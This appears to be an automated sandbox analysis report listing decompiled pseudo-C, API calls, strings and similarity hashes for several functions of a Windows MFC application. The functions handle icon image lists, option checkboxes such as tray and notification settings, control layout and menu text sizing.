Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Icon$#1146#1168ImageList_LoadReplace$MessageSend$#2096#2100#2862#4287
String ID:
API String ID: 1681832846-0
Opcode ID: dabfb3e2b97fca12aee7397db4563f06a54b4f5f7c85e89b0ec5c60319f1c69b
Instruction ID: c4a1a47b0e797b94d93bdf1f6e6a0b17a49ead956252560e849e4b318cc2506b
Opcode Fuzzy Hash: dabfb3e2b97fca12aee7397db4563f06a54b4f5f7c85e89b0ec5c60319f1c69b
Instruction Fuzzy Hash: EC51B8B07047553AEA2077769C46FAB795CEF45324F420E1AB676E61E2CDBDDC008628

Uniqueness

Uniqueness Score: -1.00%

Function 00418F2D, Relevance: 68.6, APIs: 38, Strings: 1, Instructions: 306
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00418F2D(struct HICON__* __ecx, void* __fp0) {
				void* _t105;
				void* _t109;
				struct HICON__* _t111;
				long _t118;
				long _t120;
				long _t122;
				int _t130;
				intOrPtr _t132;
				long _t133;
				void* _t135;
				long _t139;
				void* _t141;
				long _t145;
				struct HDC__* _t155;
				struct HWND__* _t169;
				int _t173;
				struct HWND__* _t176;
				intOrPtr* _t198;
				signed int _t199;
				signed int _t200;
				intOrPtr _t221;
				struct HICON__* _t228;
				struct HDC__* _t236;
				void* _t237;
				intOrPtr _t245;
				void* _t253;

				_t253 = __fp0;
				L004269E6();
				 *(_t237 - 0x18) =  *(_t237 - 0x18) | 0xffffffff;
				 *(_t237 - 0x10) = __ecx;
				if( *0x4421cc == 0) {
					_push(1);
					_push(1);
					_push(0xff);
					_push( *0x440d0c);
					_push( *0x440d08);
					L00426000();
				}
				_t105 = ImageList_GetIcon( *( *(_t237 + 8) + 4),  *(_t237 + 0xc), 0);
				 *(_t237 - 0x14) = _t105;
				if(_t105 == 0) {
					L16:
					 *[fs:0x0] =  *((intOrPtr*)(_t237 - 0xc));
					return  *(_t237 - 0x18);
				} else {
					L00401974(_t237 - 0x30);
					 *(_t237 - 0x30) = 0x42e34c;
					 *((intOrPtr*)(_t237 - 4)) = 0;
					L00401974(_t237 - 0x28);
					 *(_t237 - 0x28) = 0x42e34c;
					_t109 = L00401974(_t237 - 0x20);
					 *(_t237 - 0x20) = 0x42e34c;
					 *((char*)(_t237 - 4)) = 2;
					if(L0040214E(_t109) != 0) {
						_t245 =  *0x440cfc; // 0x1
						if(_t245 != 0) {
							_t176 = L00401307();
							if(_t176 == 0) {
								_t169 = GetDesktopWindow();
								_push(_t169);
								L00426372();
								_t176 = _t169;
							}
							_t155 = GetDC( *(_t176 + 0x20));
							_push(_t155);
							L00425FD0();
							_t236 = _t155;
							_push(_t237 - 0x30);
							_push( *(_t237 + 0xc));
							_push( *(_t237 + 8));
							_push(_t236);
							E004010A0();
							_push(_t237 - 0x30);
							L0040227A();
							_push(_t237 - 0x28);
							_push( *(_t237 + 0xc));
							_push( *(_t237 + 8));
							_push(_t236);
							E004010A0();
							_push(_t237 - 0x28);
							L004019A6();
							_push(_t237 - 0x20);
							_push( *(_t237 + 0xc));
							_push( *(_t237 + 8));
							_push(_t236);
							E004010A0();
							_push(0);
							_push(_t237 - 0x20);
							L00401221(_t253);
							ReleaseDC( *(_t176 + 0x20),  *(_t236 + 4));
						}
					}
					_t111 =  *0x4421b8;
					_t173 = 0;
					 *(_t237 + 8) = _t111;
					 *(_t237 + 0xc) = 0;
					if(_t111 <= 0) {
						L12:
						ImageList_ReplaceIcon( *0x4421cc, 0xffffffff,  *(_t237 - 0x14));
						E00401613(0x4421b0, _t237 + 0x10);
						 *(_t237 - 0x18) =  *(_t237 + 8);
						if(L0040214E( *(_t237 + 8)) != 0 &&  *0x440cfc != 0) {
							_t118 = GetSysColor(0xf);
							asm("sbb ecx, ecx");
							ImageList_AddMasked( *0x4421cc,  ~(_t237 - 0x30) &  *(_t237 - 0x2c), _t118);
							_t120 = GetSysColor(0xf);
							asm("sbb ecx, ecx");
							ImageList_AddMasked( *0x4421cc,  ~(_t237 - 0x28) &  *(_t237 - 0x24), _t120);
							_t122 = GetSysColor(0xf);
							asm("sbb ecx, ecx");
							ImageList_AddMasked( *0x4421cc,  ~(_t237 - 0x20) &  *(_t237 - 0x1c), _t122);
							E00401613(0x4421b0, _t237 + 0x10);
							E00401613(0x4421b0, _t237 + 0x10);
							E00401613(0x4421b0, _t237 + 0x10);
						}
						L15:
						DestroyIcon( *(_t237 - 0x14));
						 *(_t237 - 0x20) = 0x42c514;
						 *((char*)(_t237 - 4)) = 4;
						L00425FA6();
						 *(_t237 - 0x28) = 0x42c514;
						 *(_t237 - 0x20) = 0x42c4fc;
						 *((char*)(_t237 - 4)) = 5;
						L00425FA6();
						 *(_t237 - 0x28) = 0x42c4fc;
						 *(_t237 - 0x30) = 0x42c514;
						 *((intOrPtr*)(_t237 - 4)) = 6;
						L00425FA6();
						goto L16;
					}
					_t198 =  *0x4421b4;
					while( *_t198 !=  *((intOrPtr*)(_t237 + 0x10))) {
						_t173 = _t173 + 1;
						_t198 = _t198 + 4;
						 *(_t237 + 0xc) = _t173;
						if(_t173 < _t111) {
							continue;
						}
						goto L12;
					}
					if(_t173 < 0) {
						goto L12;
					}
					_t130 = ImageList_ReplaceIcon( *0x4421cc, _t173,  *(_t237 - 0x14));
					 *(_t237 - 0x18) = _t173;
					if(L0040214E(_t130) != 0 &&  *0x440cfc != 0) {
						_t70 = _t173 + 1; // 0x1
						_t199 = _t70;
						if(_t199 <  *(_t237 + 8)) {
							_t132 =  *0x4421b4;
							_t221 =  *((intOrPtr*)(_t237 + 0x10));
							if( *((intOrPtr*)(_t132 + _t199 * 4)) == _t221) {
								_t75 = _t173 + 2; // 0x2
								_t200 = _t75;
								if(_t200 <  *(_t237 + 8) &&  *((intOrPtr*)(_t132 + _t200 * 4)) == _t221) {
									L00425F8E();
									_push(1);
									_push(1);
									_push(0xff);
									_push( *0x440d0c);
									 *((char*)(_t237 - 4)) = 3;
									_push( *0x440d08);
									L00426000();
									_t133 = GetSysColor(0xf);
									asm("sbb ecx, ecx");
									ImageList_AddMasked( *(_t237 - 0x34),  ~(_t237 - 0x30) &  *(_t237 - 0x2c), _t133);
									_t135 = ImageList_GetIcon( *(_t237 - 0x34), 0, 0);
									 *(_t237 + 8) = _t135;
									ImageList_ReplaceIcon( *0x4421cc,  *(_t237 + 0xc) + 1, _t135);
									_t139 = GetSysColor(0xf);
									asm("sbb ecx, ecx");
									ImageList_AddMasked( *(_t237 - 0x34),  ~(_t237 - 0x28) &  *(_t237 - 0x24), _t139);
									_t141 = ImageList_GetIcon( *(_t237 - 0x34), 1, 0);
									 *(_t237 - 0x10) = _t141;
									ImageList_ReplaceIcon( *0x4421cc,  *(_t237 + 0xc) + 2, _t141);
									_t145 = GetSysColor(0xf);
									asm("sbb ecx, ecx");
									ImageList_AddMasked( *(_t237 - 0x34),  ~(_t237 - 0x20) &  *(_t237 - 0x1c), _t145);
									_t228 = ImageList_GetIcon( *(_t237 - 0x34), 2, 0);
									ImageList_ReplaceIcon( *0x4421cc,  *(_t237 + 0xc) + 3, _t228);
									DestroyIcon( *(_t237 + 8));
									DestroyIcon( *(_t237 - 0x10));
									DestroyIcon(_t228);
									 *((char*)(_t237 - 4)) = 2;
									L00425FB2();
								}
							}
						}
					}
					goto L15;
				}
			}

0x00418f2d
0x00418f32
0x00418f3a
0x00418f48
0x00418f50
0x00418f52
0x00418f54
0x00418f56
0x00418f5c
0x00418f62
0x00418f68
0x00418f68
0x00418f77
0x00418f7f
0x00418f82
0x00419189
0x00419191
0x00419199
0x00418f88
0x00418f8c
0x00418f96
0x00418f9c
0x00418f9f
0x00418fa4
0x00418faa
0x00418faf
0x00418fb2
0x00418fbd
0x00418fc3
0x00418fc9
0x00418fd4
0x00418fd8
0x00418fda
0x00418fe0
0x00418fe1
0x00418fe6
0x00418fe6
0x00418feb
0x00418ff1
0x00418ff2
0x00418ff7
0x00418ffc
0x00419000
0x00419003
0x00419006
0x00419007
0x00419012
0x00419013
0x0041901e
0x0041901f
0x00419022
0x00419025
0x00419026
0x00419031
0x00419032
0x0041903d
0x0041903e
0x00419041
0x00419044
0x00419045
0x00419050
0x00419052
0x00419053
0x0041905e
0x0041905e
0x00418fc9
0x00419064
0x00419069
0x0041906d
0x00419070
0x00419073
0x00419091
0x0041909c
0x004190ad
0x004190b5
0x004190bf
0x004190d2
0x004190df
0x004190ec
0x004190f0
0x004190f8
0x00419104
0x00419108
0x00419110
0x0041911c
0x00419124
0x0041912f
0x0041913a
0x0041913a
0x0041913f
0x00419142
0x0041914d
0x00419153
0x00419157
0x00419161
0x00419164
0x0041916a
0x0041916e
0x00419173
0x00419176
0x0041917c
0x00419183
0x00000000
0x00419188
0x00419075
0x0041907b
0x00419086
0x00419087
0x0041908c
0x0041908f
0x00000000
0x00000000
0x00000000
0x0041908f
0x0041919e
0x00000000
0x00000000
0x004191b4
0x004191b6
0x004191c0
0x004191d3
0x004191d3
0x004191d9
0x004191df
0x004191e4
0x004191ea
0x004191f0
0x004191f0
0x004191f6
0x00419208
0x0041920d
0x0041920f
0x00419211
0x00419215
0x0041921b
0x0041921f
0x00419225
0x00419232
0x0041923f
0x00419249
0x00419252
0x00419258
0x00419267
0x0041926b
0x00419273
0x0041927c
0x00419285
0x0041928b
0x0041929c
0x004192a0
0x004192a8
0x004192b1
0x004192c0
0x004192d0
0x004192db
0x004192e0
0x004192e3
0x004192e8
0x004192ec
0x004192ec
0x004191f6
0x004191ea
0x004191d9
0x00000000
0x004191c0

APIs

_EH_prolog.MSVCRT ref: 00418F32
#2096.MFC42(000000FF,00000001,00000001), ref: 00418F68
ImageList_GetIcon.COMCTL32(?,?,00000000), ref: 00418F77
GetDesktopWindow.USER32 ref: 00418FDA
#2864.MFC42(00000000), ref: 00418FE1
GetDC.USER32(?), ref: 00418FEB
#2859.MFC42(00000000), ref: 00418FF2
ReleaseDC.USER32 ref: 0041905E
ImageList_ReplaceIcon.COMCTL32(000000FF,?), ref: 0041909C
GetSysColor.USER32(0000000F), ref: 004190D2
ImageList_AddMasked.COMCTL32(?,00000000), ref: 004190EC
GetSysColor.USER32(0000000F), ref: 004190F0
ImageList_AddMasked.COMCTL32(?,00000000), ref: 00419104
GetSysColor.USER32(0000000F), ref: 00419108
ImageList_AddMasked.COMCTL32(?,00000000), ref: 0041911C
DestroyIcon.USER32(?), ref: 00419142
#2414.MFC42 ref: 00419157
#2414.MFC42 ref: 0041916E
#2414.MFC42 ref: 00419183
ImageList_ReplaceIcon.COMCTL32(00000000,?), ref: 004191B4
#384.MFC42 ref: 00419208
#2096.MFC42(000000FF,00000001,00000001), ref: 00419225
GetSysColor.USER32(0000000F), ref: 00419232
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00419249
ImageList_GetIcon.COMCTL32(?,00000000,00000000), ref: 00419252
ImageList_ReplaceIcon.COMCTL32(?,00000000), ref: 00419267
GetSysColor.USER32(0000000F), ref: 0041926B
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0041927C
ImageList_GetIcon.COMCTL32(?,00000001,00000000), ref: 00419285
ImageList_ReplaceIcon.COMCTL32(?,00000000), ref: 0041929C
GetSysColor.USER32(0000000F), ref: 004192A0
ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 004192B1
ImageList_GetIcon.COMCTL32(?,00000002,00000000), ref: 004192BA
ImageList_ReplaceIcon.COMCTL32(?,00000000), ref: 004192D0
DestroyIcon.USER32(?), ref: 004192DB
DestroyIcon.USER32(?), ref: 004192E0
DestroyIcon.USER32(00000000), ref: 004192E3
#686.MFC42 ref: 004192EC

Strings

LB, xrefs: 00418F91

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: ImageList_$Icon$ColorMasked$Replace$Destroy$#2414$#2096$#2859#2864#384#686DesktopH_prologReleaseWindow
String ID: LB
API String ID: 4005772540-3532020319
Opcode ID: 4e5b6c950457e7fb426c4839a38b0886a64b8d7cd382db1aa965ae2512162a54
Instruction ID: c2e90133d53ef3aa1ac6b5a6da931e9da992c79ca7599576653cfb1451726a2b
Opcode Fuzzy Hash: 4e5b6c950457e7fb426c4839a38b0886a64b8d7cd382db1aa965ae2512162a54
Instruction Fuzzy Hash: C4C17D75900119AFDF14DFA1ED95EEE7BB5FF49314F04412AFA05A72A0CB789A40CB28

Uniqueness

Uniqueness Score: -1.00%

Function 004014DD, Relevance: 64.9, APIs: 23, Strings: 14, Instructions: 105
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E004014DD(void* __eax, void* __ecx) {
				long _t19;
				long _t21;
				long _t23;
				long _t25;
				long _t27;
				long _t29;
				long _t31;
				void* _t45;

				_t45 = __ecx;
				L00426426();
				L00425E44();
				L00425E3E();
				_t19 = SendMessageA( *(__ecx + 0x80), 0xf1,  *(__eax + 4), 0);
				L00425E44();
				L00425E3E();
				_t21 = SendMessageA( *(_t45 + 0x180), 0xf1,  *(_t19 + 4), 0);
				L00425E44();
				L00425E3E();
				_t23 = SendMessageA( *(_t45 + 0x1c0), 0xf1,  *(_t21 + 4), 0);
				L00425E44();
				L00425E3E();
				_t25 = SendMessageA( *(_t45 + 0x200), 0xf1,  *(_t23 + 4), 0);
				L00425E44();
				L00425E3E();
				_t27 = SendMessageA( *(_t45 + 0xc0), 0xf1,  *(_t25 + 4), 0);
				L00425E44();
				L00425E3E();
				_t29 = SendMessageA( *(_t45 + 0x140), 0xf1,  *(_t27 + 4), 0);
				L00425E44();
				L00425E3E();
				_t31 = SendMessageA( *(_t45 + 0x100), 0xf1,  *(_t29 + 4), 0);
				__imp__CoInitialize(0, "Options", "NotifyPrivateMessage", 1, "Options", "NotifyRemove", 1, "Options", "NotifyAdd", 1, "Options", "ShortcutMenu", 1, "Options", "ShortcutDesktop", 1, "Options", "MinimizeToTray", 1, "Options", "ShowSplash", 0);
				return 0 | _t31 >= 0x00000000;
			}

0x0040e901
0x0040e903
0x0040e908
0x0040e91f
0x0040e938
0x0040e93a
0x0040e950
0x0040e95e
0x0040e960
0x0040e976
0x0040e984
0x0040e986
0x0040e99c
0x0040e9aa
0x0040e9ac
0x0040e9c2
0x0040e9d0
0x0040e9d2
0x0040e9e8
0x0040e9f6
0x0040e9f8
0x0040ea0e
0x0040ea1c
0x0040ea1f
0x0040ea32

APIs

#4710.MFC42 ref: 0040E903
#1168.MFC42 ref: 0040E908
#3521.MFC42(Options,ShowSplash,00000000), ref: 0040E91F
SendMessageA.USER32 ref: 0040E938
#1168.MFC42 ref: 0040E93A
#3521.MFC42(Options,MinimizeToTray,00000001), ref: 0040E950
SendMessageA.USER32 ref: 0040E95E
#1168.MFC42 ref: 0040E960
#3521.MFC42(Options,ShortcutDesktop,00000001), ref: 0040E976
SendMessageA.USER32 ref: 0040E984
#1168.MFC42 ref: 0040E986
#3521.MFC42(Options,ShortcutMenu,00000001), ref: 0040E99C
SendMessageA.USER32 ref: 0040E9AA
#1168.MFC42 ref: 0040E9AC
#3521.MFC42(Options,NotifyAdd,00000001), ref: 0040E9C2
SendMessageA.USER32 ref: 0040E9D0
#1168.MFC42 ref: 0040E9D2
#3521.MFC42(Options,NotifyRemove,00000001), ref: 0040E9E8
SendMessageA.USER32 ref: 0040E9F6
#1168.MFC42 ref: 0040E9F8
#3521.MFC42(Options,NotifyPrivateMessage,00000001), ref: 0040EA0E
SendMessageA.USER32 ref: 0040EA1C
CoInitialize.OLE32(00000000), ref: 0040EA1F

Strings

Options, xrefs: 0040E949
ShortcutDesktop, xrefs: 0040E96A
Options, xrefs: 0040EA07
MinimizeToTray, xrefs: 0040E944
NotifyPrivateMessage, xrefs: 0040EA02
ShowSplash, xrefs: 0040E913
NotifyRemove, xrefs: 0040E9DC
Options, xrefs: 0040E918
Options, xrefs: 0040E9BB
ShortcutMenu, xrefs: 0040E990
Options, xrefs: 0040E96F
Options, xrefs: 0040E9E1
NotifyAdd, xrefs: 0040E9B6
Options, xrefs: 0040E995

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#3521MessageSend$#4710Initialize
String ID: MinimizeToTray$NotifyAdd$NotifyPrivateMessage$NotifyRemove$Options$Options$Options$Options$Options$Options$Options$ShortcutDesktop$ShortcutMenu$ShowSplash
API String ID: 4202957865-2085320903
Opcode ID: 51367e9f719fa8b4abe38d72f8fe3f61c2591de8af83374cd91b4e3839c84acb
Instruction ID: d481293b63a27fefdfe2eaca82e192f5d2ca3140d30a90fc94559ecbbdfc94c8
Opcode Fuzzy Hash: 51367e9f719fa8b4abe38d72f8fe3f61c2591de8af83374cd91b4e3839c84acb
Instruction Fuzzy Hash: 8A216FB13507187FFA1073729C86F7B7A9DDF44748F52441AB249AB192C9BEAC10972C

Uniqueness

Uniqueness Score: -1.00%

Function 00401816, Relevance: 59.7, APIs: 31, Strings: 3, Instructions: 247COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C40B

Part of subcall function 00401528: #4457.MFC42(?), ref: 0041F237

#6625.MFC42(?,00000800,50402834), ref: 0040C459
#4163.MFC42(00000080,?,00000800,50402834), ref: 0040C471
#2087.MFC42(?,00000067,00402834,00000067,00000080,?,00000800,50402834), ref: 0040C48E
#2117.MFC42(?,50008200,0000E801,?,0000E805,00000000,?,00000067,00402834,00000067,00000080,?,00000800,50402834), ref: 0040C4E5
#6000.MFC42(00440734,00000004,?,50008200,0000E801,?,0000E805,00000000,?,00000067,00402834,00000067,00000080,?,00000800,50402834), ref: 0040C4FB
#2011.MFC42(0000806E,0000806E,00000200,0000003C,00440734,00000004,?,50008200,0000E801,?,0000E805,00000000,?,00000067,00402834,00000067), ref: 0040C518
#6067.MFC42(00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004,?,50008200,0000E801,?,0000E805,00000000,?,00000067,00402834), ref: 0040C520
#540.MFC42(00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004,?,50008200,0000E801,?,0000E805,00000000,?,00000067,00402834), ref: 0040C528
#4160.MFC42(00008050,00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004,?,50008200,0000E801,?,0000E805,00000000,?,00000067), ref: 0040C538
#5871.MFC42(?,?,00000064,00000096,00000000,0000007B,50002800,00008050,00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004), ref: 0040C580
#2627.MFC42(0000F000,?,?,00000064,00000096,00000000,0000007B,50002800,00008050,00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004), ref: 0040C58D
#4160.MFC42 ref: 0040C5A4
#6199.MFC42(?), ref: 0040C5B2
#2626.MFC42(0000F000,?), ref: 0040C5BE
#2494.MFC42(?,00000000,00000000,0000F000,?), ref: 0040C5CE
#4160.MFC42(00008051), ref: 0040C5E7
#6199.MFC42(?,00008051), ref: 0040C5F5
#2626.MFC42(0000F000,?,00008051), ref: 0040C601
GetWindowRect.USER32 ref: 0040C610
#2494.MFC42(?,0000E81B,?), ref: 0040C628
#4160.MFC42(0000E000), ref: 0040C641
#5871.MFC42(00002000,00000080,?,0000E000), ref: 0040C66F
#2626.MFC42(0000F000,00002000,00000080,?,0000E000), ref: 0040C67D
#2494.MFC42(?,0000E81D,00000000,0000F000,00002000,00000080,?,0000E000), ref: 0040C68B
#6199.MFC42(?,?,0000E81D,00000000,0000F000,00002000,00000080,?,0000E000), ref: 0040C695
#4146.MFC42(ControlsPos,?,?,0000E81D,00000000,0000F000,00002000,00000080,?,0000E000), ref: 0040C6B7
#800.MFC42(?,00000064,00000096,00000000,0000007B,50002800,00008050,00000000,0000806E,0000806E,00000200,0000003C,00440734,00000004,?,50008200), ref: 0040C73D

Strings

ControlsPos, xrefs: 0040C6B0
MinimizeToTray, xrefs: 0040C6EC
Options, xrefs: 0040C6F1

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4160$#2494#2626#6199$#5871$#2011#2087#2117#2627#4146#4163#4457#540#6000#6067#6625#800H_prologRectWindow
String ID: ControlsPos$MinimizeToTray$Options
API String ID: 1149715691-773785485
Opcode ID: 8ff46abac5e274bec768e0a6dd62a34cef5c433e77181649665c08434eb73a2e
Instruction ID: 8021cdf516aa46f1e5d6542dd90e0141bb6cb9670154149599d19684283ed99a
Opcode Fuzzy Hash: 8ff46abac5e274bec768e0a6dd62a34cef5c433e77181649665c08434eb73a2e
Instruction Fuzzy Hash: 48818370700214ABDB14EF25CDD6FAE3669AF84704F40417EBD06AE1D6DF789A05CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004019F1, Relevance: 58.8, APIs: 39, Instructions: 262
windowCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E004019F1(intOrPtr __ecx) {
				int _t130;
				struct HWND__* _t138;
				struct HDC__* _t140;
				int _t143;
				signed int _t144;
				intOrPtr _t148;
				void* _t150;
				void* _t155;
				void* _t166;
				struct tagSIZE _t171;
				void* _t173;
				struct HWND__* _t174;
				intOrPtr _t176;
				signed int _t182;
				signed int _t185;
				void* _t242;
				int _t245;
				struct HDC__* _t247;
				void* _t249;
				void* _t257;
				void* _t258;

				L004269E6();
				_t176 = __ecx;
				 *((intOrPtr*)(_t249 - 0x28)) = __ecx;
				_t130 = L0040214E(E0042923B);
				if(_t130 == 0) {
					_t245 = 0;
					goto L6;
				} else {
					_t245 = 0;
					_t257 =  *0x440d00 - _t245; // 0x1
					if(_t257 != 0) {
						_t258 =  *0x440d04 - _t245; // 0x1
						if(_t258 != 0) {
							L6:
							L00425E08();
							 *(_t249 - 4) = _t245;
							L00425E08();
							 *(_t249 - 0x30) = _t245;
							 *((intOrPtr*)(_t249 - 0x34)) = 0x42dce0;
							_t182 = 0xf;
							memset(_t249 - 0x94, 0, _t182 << 2);
							 *(_t249 - 4) = 2;
							 *(_t249 - 0x1e8) = 0x154;
							SystemParametersInfoA(0x29, 0x154, _t249 - 0x1e8, _t245);
							_t185 = 0xf;
							_push(CreateFontIndirectA(memcpy(_t249 - 0x94, _t249 - 0x148, _t185 << 2)));
							L004264BC();
							_t138 = L00401307();
							 *(_t249 - 0x38) = _t138;
							if(_t138 == 0) {
								_t174 = GetDesktopWindow();
								_push(_t174);
								L00426372();
								 *(_t249 - 0x38) = _t174;
							}
							_t140 = GetDC( *( *(_t249 - 0x38) + 0x20));
							L00425FD0();
							_t247 = _t140;
							 *((intOrPtr*)(_t249 - 0x3c)) =  *((intOrPtr*)(_t247->i + 0x30))(_t249 - 0x34, _t140);
							_t143 = GetMenuItemCount( *(_t176 + 4));
							 *(_t249 - 0x1c) =  *(_t249 - 0x1c) | 0xffffffff;
							 *(_t249 - 0x18) =  *(_t249 - 0x18) & 0x00000000;
							 *(_t249 - 0x2c) = _t143;
							if(_t143 > 0) {
								do {
									_push(_t249 - 0x20);
									_t166 = L0040154B( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 - 0x28)) + 0xc)) +  *(_t249 - 0x18) * 4)));
									_push(_t166);
									 *(_t249 - 4) = 3;
									L00426054();
									 *(_t249 - 4) = 2;
									L00425DFC();
									_push(9);
									L00426624();
									_t242 = _t166;
									L0042663C();
									if(_t242 == 0xffffffff) {
										_push(_t249 - 0x14);
										L00426054();
									} else {
										_t173 = _t249 - 0x24;
										_push(_t242);
										_push(_t173);
										L0042661E();
										_push(_t173);
										 *(_t249 - 4) = 4;
										L00426054();
										 *(_t249 - 4) = 2;
										L00425DFC();
									}
									_push(0x440d18);
									L004263BA();
									asm("repne scasb");
									GetTextExtentPoint32A( *(_t247 + 8),  *(_t249 - 0x10),  !(_t249 - 0x00000010 | 0xffffffff) - 1, _t249 - 0x48);
									_t171 =  *(_t249 - 0x48);
									if(_t171 >  *(_t249 - 0x1c)) {
										 *(_t249 - 0x1c) = _t171;
									}
									 *(_t249 - 0x18) =  *(_t249 - 0x18) + 1;
								} while ( *(_t249 - 0x18) <  *(_t249 - 0x2c));
							}
							_t144 = 0;
							 *(_t249 - 0x18) = 0;
							if( *(_t249 - 0x2c) > 0) {
								do {
									_push(_t249 - 0x24);
									_t148 = L0040154B( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 - 0x28)) + 0xc)) + _t144 * 4)));
									_push(_t148);
									 *(_t249 - 4) = 5;
									L00426054();
									 *(_t249 - 4) = 2;
									L00425DFC();
									_push(9);
									L00426624();
									 *((intOrPtr*)(_t249 - 0x20)) = _t148;
									if(_t148 != 0xffffffff) {
										L0042663C();
										_push( *((intOrPtr*)(_t249 - 0x20)));
										_t150 = _t249 - 0x40;
										_push(_t150);
										L0042661E();
										_push(_t150);
										 *(_t249 - 4) = 6;
										L00426054();
										 *(_t249 - 4) = 2;
										L00425DFC();
										asm("repne scasb");
										GetTextExtentPoint32A( *(_t247 + 8),  *(_t249 - 0x10),  !(_t249 - 0x00000040 | 0xffffffff) - 1, _t249 - 0x50);
										if( *(_t249 - 0x50) <  *(_t249 - 0x1c)) {
											do {
												_push(0x20);
												L004266E4();
												asm("repne scasb");
												GetTextExtentPoint32A( *(_t247 + 8),  *(_t249 - 0x10),  !(_t249 - 0x00000010 | 0xffffffff) - 1, _t249 - 0x58);
											} while ( *(_t249 - 0x58) <  *(_t249 - 0x1c));
										}
										_push( *((intOrPtr*)(_t249 - 0x20)));
										_t155 = _t249 - 0x44;
										_push(_t155);
										L0042662A();
										_push(_t155);
										 *(_t249 - 4) = 7;
										L004263B4();
										 *(_t249 - 4) = 2;
										L00425DFC();
										L00402117( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t249 - 0x28)) + 0xc)) +  *(_t249 - 0x18) * 4)),  *(_t249 - 0x10));
									}
									_t144 =  *(_t249 - 0x18) + 1;
									 *(_t249 - 0x18) = _t144;
								} while (_t144 <  *(_t249 - 0x2c));
							}
							 *((intOrPtr*)(_t247->i + 0x30))( *((intOrPtr*)(_t249 - 0x3c)));
							_t130 = ReleaseDC( *( *(_t249 - 0x38) + 0x20),  *(_t247 + 4));
							L00425FA6();
							 *((intOrPtr*)(_t249 - 0x34)) = 0x42c514;
							 *(_t249 - 4) = 8;
							L00425FA6();
							 *(_t249 - 4) =  *(_t249 - 4) & 0x00000000;
							 *((intOrPtr*)(_t249 - 0x34)) = 0x42c4fc;
							L00425DFC();
							 *(_t249 - 4) =  *(_t249 - 4) | 0xffffffff;
							L00425DFC();
						}
					}
				}
